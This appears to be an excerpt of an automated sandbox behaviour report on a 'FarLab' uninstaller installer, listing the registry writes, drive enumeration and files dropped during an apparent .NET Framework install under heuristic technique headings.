| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsecimpl.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubInitialize" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "WintrustCertificateTrust" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "CORPolicyEE" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubLoadSignature" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubLoadSignature" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubCheckCert" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubInitialize" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubLoadMessage" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "WintrustCertificateTrust" | C:\Windows\system32\msiexec.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
Network Share Discovery
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\perfc00A.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\SysWOW64\msvcp120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\perfh00A.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\aspnet_counters.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcr100_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\perfc007.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfc009.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfc00A.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfc010.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfh010.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\PerfStringBackup.INI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcr120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\perfh011.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\SysWOW64\PerfStringBackup.TMP | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\dfshim.dll.mui | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\AutoRecover\7073EBB8E2F3C70E0FA1F650B7DEA970.mof | C:\Windows\system32\wbem\mofcomp.exe | N/A |
| File created | C:\Windows\system32\perfh010.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\SysWOW64\aspnet_counters.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcp120_clr0400.dll | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| File created | C:\Windows\system32\perfh009.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\AutoRecover\7073EBB8E2F3C70E0FA1F650B7DEA970.mof | C:\Windows\SysWOW64\wbem\mofcomp.exe | N/A |
| File created | C:\Windows\system32\perfh00C.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfc011.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcr100_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SysWOW64\msvcr120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SysWOW64\msvcr110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\AutoRecover\E6195BA9E153534E5472835E2F29A5B0.mof | C:\Windows\system32\wbem\mofcomp.exe | N/A |
| File created | C:\Windows\system32\perfc00C.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\PerfStringBackup.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcr100_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\PerfStringBackup.INI | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfh009.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfh00C.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\dfshim.dll.mui | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SysWOW64\msvcr100_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\perfh00A.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\system32\aspnet_counters.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\aspnet_counters.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcr110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\AutoRecover\6F8564A71977AE6B940705DCC4847A8D.mof | C:\Windows\SysWOW64\wbem\mofcomp.exe | N/A |
| File created | C:\Windows\system32\perfh007.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfc009.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcr110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\en-US\dfshim.dll.mui | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcr120_clr0400.dll | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\AutoRecover\D361F8B496FD6DAF7BEEF497E09C0DC1.mof | C:\Windows\SysWOW64\wbem\mofcomp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcp110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcr120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\perfc010.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfh011.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\system32\perfh007.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcr110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\en-US\dfshim.dll.mui | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\perfc007.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcr120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\perfc00C.dat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcp120_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\AutoRecover\716FDC254E211F547A560E1A71D0E6CA.mof | C:\Windows\system32\wbem\mofcomp.exe | N/A |
| File created | C:\Windows\system32\perfc011.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\SysWOW64\msvcp110_clr0400.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-7RD4C.tmp | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\FarLabUninstaller\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-R8GVT.tmp | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-GMK5P.tmp | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-LJV3J.tmp | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\wizardCreateRoles.ascx.resx | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Http.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\SMSvcHost 4.0.0.0\0019\_SMSvcHostPerfCounters.ini | C:\Windows\system32\lodctr.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDB99.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE822.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Diagnostics.TextWriterTraceListener.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\Roles\App_LocalResources\manageAllRoles.aspx.resx | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\aspnet_state\0013\aspnet_state_perf.ini | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE4AF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\home2.aspx | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Messaging\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Messaging.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\ASP.NET\0001\aspnet_perf2.ini | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\inf\MSDTC Bridge 4.0.0.0\0014\_TransactionBridgePerfCounters.ini | C:\Windows\SysWOW64\lodctr.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceProcess.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\ASP.NET\0416\aspnet_perf2.ini | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\_DataPerfCounters.ini | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpe.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WorkflowServiceHostPerformanceCounters.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Device.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.InteropServices.WindowsRuntime.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.InteropServices.RuntimeInformation.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\deselectedTab_1x1.gif | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\Browsers\blackberry.browser | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Common.targets | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Resources.ResourceManager\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Resources.ResourceManager.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\Microsoft.VisualBasic.Activities.CompilerUI.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\_SMSvcHostPerfCounters.ini | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Claims\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Claims.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AppContext\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.AppContext.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\Browsers\generic.browser | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Linq.Expressions.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIACE5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Serialization.Formatters.Soap.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.Entity.Design.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\NlsLexicons0009.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\Browsers\ucbrowser.browser | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\aspnet_state\0010\aspnet_state_perf.ini | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File created | C:\Windows\inf\MSDTC Bridge 4.0.0.0\000E\_TransactionBridgePerfCounters.ini | C:\Windows\SysWOW64\lodctr.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Internal.Tasks.Dataflow\v4.0_4.0.0.0__b77a5c561934e089\Microsoft.Internal.Tasks.Dataflow.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_perf.ini | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\AppConfig\App_LocalResources\DebugAndTrace.aspx.resx | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\help.jpg | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\ASP.NET\0000\aspnet_perf2.ini | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xml.XPath.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Xml.XmlSerializer.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.CSharp.targets | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7838.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onWhite.gif | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.Cryptography.Encoding.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallSqlState.sql | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.Compatibility.Data.dll | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ac0ba72aca448f27fa5b322872\SetupUtility.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DE61Q.tmp\farlab_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
